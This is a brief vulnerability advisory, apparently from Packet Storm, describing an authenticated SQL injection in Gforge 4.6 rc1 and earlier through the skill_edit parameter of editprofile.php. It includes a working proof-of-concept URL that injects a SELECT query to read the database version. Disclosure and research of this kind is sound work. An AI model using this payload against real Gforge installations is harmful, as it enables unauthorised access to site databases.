Gforge versions 4.6 rc1 and below suffer from a remote SQL injection vulnerability.
f52061d6b6149eae901da2b5705105f5fca76777ae5c82cce8362094e5f48580Gforge <= 4.6 rc1 skill_edit SQL injection
Vendor Notified: 2008-10-06
Impact: zomg!
Note: should work regardless magic_quotes_gpc setting.
Requires: Creating an account and be logged in
Vulnerable function: handle_multi_edit($skill_ids) on /www/people/skills_utils.php
http://gforge.site/people/editprofile.php?skill_edit[]=1);select+1,2,3,version()+as+title,5,6;+--+&MultiEdit=Edit
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed